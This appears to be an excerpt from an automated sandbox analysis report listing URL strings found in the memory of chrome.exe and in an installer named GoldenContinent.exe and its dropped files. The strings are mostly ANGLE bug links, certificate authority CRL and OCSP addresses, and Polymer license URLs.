                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3584
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586
                Source: chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3623
                Source: chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3624
                Source: chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3625
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3832
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3862
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3965
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3970
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4324
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4384
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4405
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4428
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4551
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4633
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4722
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4836
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4937
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5007
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5055
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5061
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5281
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5371
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5375
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5421
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5430
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5535
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5658
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5750
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5881
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5901
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6041
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6048
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6141
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6248
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6439
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6651
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6692
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6755
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6860
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6876
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6878
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6929
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6953
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
                Source: GoldenContinent.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: GoldenContinent.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: GoldenContinent.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: Relationship.com.1.dr, Futures.0.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                Source: GoldenContinent.exeString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                Source: Relationship.com.1.dr, Futures.0.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                Source: GoldenContinent.exeString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
                Source: GoldenContinent.exe, Relationship.com.1.dr, Futures.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                Source: Relationship.com.1.dr, Futures.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                Source: Relationship.com.1.dr, Futures.0.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                Source: GoldenContinent.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: GoldenContinent.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: GoldenContinent.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
                Source: chrome.exe, 0000000F.00000003.2175638995.000078100325C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175408842.0000781003240000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175279363.0000781003168000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175468012.000078100310C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsbin.com/temexa/4.
                Source: GoldenContinent.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: GoldenContinent.exeString found in binary or memory: http://ocsp.digicert.com0A
                Source: GoldenContinent.exeString found in binary or memory: http://ocsp.digicert.com0C
                Source: GoldenContinent.exeString found in binary or memory: http://ocsp.digicert.com0X
                Source: Relationship.com.1.dr, Futures.0.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                Source: GoldenContinent.exeString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                Source: GoldenContinent.exeString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                Source: GoldenContinent.exeString found in binary or memory: http://ocsp.globalsign.com/rootr30;
                Source: Relationship.com.1.dr, Futures.0.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                Source: Relationship.com.1.dr, Futures.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                Source: Relationship.com.1.dr, Futures.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                Source: chrome.exe, 0000000F.00000003.2178034495.000078100340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176878407.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177743116.00007810032D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176707193.0000781002EDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175638995.000078100325C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175408842.0000781003240000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175279363.0000781003168000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175441776.0000781003290000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177474988.00007810025A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177249935.00007810031B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175468012.000078100310C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176808055.0000781002C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/AUTHORS.txt
                Source: chrome.exe, 0000000F.00000003.2178034495.000078100340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176878407.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177743116.00007810032D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176707193.0000781002EDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175638995.000078100325C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175408842.0000781003240000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175279363.0000781003168000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175441776.0000781003290000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177474988.00007810025A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177249935.00007810031B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175468012.000078100310C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176808055.0000781002C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
                Source: chrome.exe, 0000000F.00000003.2178034495.000078100340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176878407.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177743116.00007810032D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176707193.0000781002EDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175638995.000078100325C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175408842.0000781003240000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175279363.0000781003168000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175441776.0000781003290000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177474988.00007810025A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177249935.00007810031B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175468012.000078100310C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176808055.0000781002C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/LICENSE.txt
                Source: chrome.exe, 0000000F.00000003.2178034495.000078100340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176878407.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177743116.00007810032D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176707193.0000781002EDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175638995.000078100325C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175408842.0000781003240000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175279363.0000781003168000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175441776.0000781003290000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177474988.00007810025A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177249935.00007810031B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175468012.000078100310C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176808055.0000781002C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/PATENTS.txt
                Source: GoldenContinent.exeString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                Source: Relationship.com.1.dr, Futures.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
